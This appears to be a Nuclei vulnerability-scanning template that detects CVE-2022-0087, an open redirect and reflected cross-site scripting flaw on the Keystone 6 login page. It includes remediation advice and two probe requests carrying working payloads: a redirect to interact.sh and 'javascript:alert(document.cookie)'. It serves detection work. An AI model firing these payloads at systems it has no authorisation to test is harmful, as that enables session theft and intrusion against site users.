id: CVE-2022-0087

info:
  name: Keystone 6 Login Page - Open Redirect and Cross-Site Scripting
  author: ShivanshKhari
  severity: medium
  description: |
    On the login page, there is a "from=" parameter in the URL which is vulnerable to open redirect and can be escalated to reflected XSS.
  remediation: |
    Please upgrade to @keystone-6/auth >= 1.0.2, where this vulnerability has been closed. If you are using @keystone-next/auth, we strongly recommend you upgrade to @keystone-6.
  reference:
    - https://huntr.com/bounties/c9d7374f-2cb9-4bac-9c90-a965942f413e
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0087
    - https://github.com/keystonejs/keystone/commit/96bf833a23b1a0a5d365cf394467a943cc481b38
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0087
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.41295
    cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 2
    vendor: keystonejs
    product: keystone
    framework: node.js
  tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs

http:
  - method: GET
    path:
      - "{{BaseURL}}/signin?from=https://interact.sh"
      - "{{BaseURL}}/signin?from=javascript:alert(document.cookie)"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://interact.sh"

      - type: word
        part: body
        words:
          - "alert(document.cookie)"
# digest: 4b0a00483046022100c140ee61632dc67c9acc81a49ec451a15bb40801fed7f1b72d892508b42222ed022100e1b0b356f74b2f34f558cb407535b0fdecfbcdaaa934de641550cb0f2e1a290e:922c64590222798bb761d5b6d8e72950